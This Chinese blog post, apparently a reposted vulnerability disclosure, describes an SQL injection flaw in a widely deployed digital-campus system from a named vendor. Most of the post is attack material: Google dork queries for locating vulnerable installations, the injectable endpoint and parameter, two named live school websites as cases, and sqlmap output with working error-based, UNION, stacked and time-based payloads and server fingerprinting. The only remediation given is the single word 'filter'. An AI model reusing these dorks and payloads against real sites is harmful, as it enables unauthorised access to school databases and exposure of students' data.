某通用型数字校园系统SQL注射漏洞(涉及大量学

时间: 2020-10-11|tag: 58次围观|0 条评论

无锡新座标教育技术有限公司 的数字化校园系统存在通用型SQL注射漏洞

装机量比较大。

谷歌关键词:intitle:校园 技术支持:无锡新座标教育技术有限公司

连接:
 

http://209.116.186.246/#newwindow=1&q=intitle:%E6%A0%A1%E5%9B%AD+%E6%8A%80%E6%9C%AF%E6%94%AF%E6%8C%81%EF%BC%9A%E6%97%A0%E9%94%A1%E6%96%B0%E5%BA%A7%E6%A0%87%E6%95%99%E8%82%B2%E6%8A%80%E6%9C%AF%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8

近4000收录量

 

某通用型数字校园系统SQL注射漏洞(涉及大量学插图

SQL注射点:

DPMA/FWeb/WorkRoomWeb/Web/Index.aspx?TID=

谷歌关键词:inurl:DPMA/FWeb/WorkRoomWeb/Web/Index.aspx?TID=

连接:

http://209.116.186.246/#newwindow=1&q=inurl:DPMA%2FFWeb%2FWorkRoomWeb%2FWeb%2FIndex.aspx%3FTID%3D

35w收录
 

某通用型数字校园系统SQL注射漏洞(涉及大量学插图1

案例1:

http://szxy.ncjy.net/DPMA/FWeb/WorkRoomWeb/Web/Index.aspx?TID=1000210106

---

Place: GET

Parameter: TID

Type: error-based

Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause

Payload: TID=1000210106 AND 8259=CONVERT(INT,(SELECT CHAR(113)+CHAR(108)+CHA

R(105)+CHAR(117)+CHAR(113)+(SELECT (CASE WHEN (8259=8259) THEN CHAR(49) ELSE CHA

R(48) END))+CHAR(113)+CHAR(112)+CHAR(111)+CHAR(116)+CHAR(113)))

Type: UNION query

Title: Generic UNION query (NULL) - 11 columns

Payload: TID=1000210106 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(

113)+CHAR(108)+CHAR(105)+CHAR(117)+CHAR(113)+CHAR(114)+CHAR(88)+CHAR(111)+CHAR(9

8)+CHAR(103)+CHAR(113)+CHAR(117)+CHAR(115)+CHAR(100)+CHAR(99)+CHAR(113)+CHAR(112

)+CHAR(111)+CHAR(116)+CHAR(113),NULL,NULL,NULL,NULL--

Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query)

Payload: TID=1000210106 AND 2239=(SELECT COUNT(*) FROM sysusers AS sys1,sysu

sers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6

,sysusers AS sys7)

---

web server operating system: Windows

web application technology: ASP.NET, Nginx, ASP.NET 2.0.50727

back-end DBMS: Microsoft SQL Server 2005

 

某通用型数字校园系统SQL注射漏洞(涉及大量学插图2

 

案例2:


http://www.azxx.net/dpma/FWeb/WorkRoomWeb/Web/Index.aspx?TID=3050010176
---
Place: GET
Parameter: TID
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: TID=3050010176 AND 3214=CONVERT(INT,(SELECT CHAR(113)+CHAR(102)+CHA
R(97)+CHAR(97)+CHAR(113)+(SELECT (CASE WHEN (3214=3214) THEN CHAR(49) ELSE CHAR(
48) END))+CHAR(113)+CHAR(102)+CHAR(104)+CHAR(122)+CHAR(113)))

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: TID=3050010176 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(
113)+CHAR(102)+CHAR(97)+CHAR(97)+CHAR(113)+CHAR(80)+CHAR(111)+CHAR(70)+CHAR(67)+
CHAR(84)+CHAR(104)+CHAR(108)+CHAR(66)+CHAR(76)+CHAR(87)+CHAR(113)+CHAR(102)+CHAR
(104)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: TID=3050010176; WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: TID=3050010176 WAITFOR DELAY '0:0:5'--
---
[21:49:18] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005

 

某通用型数字校园系统SQL注射漏洞(涉及大量学插图3

 修复方案:

过滤
    上一篇: Discuz某默认插件存在本地文件包含漏洞(需后台

    下一篇: 某OA系统无需登录GetShell - 网站安全 - 自学php
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《某通用型数字校园系统SQL注射漏洞(涉及大量学
   

还没有人抢沙发呢~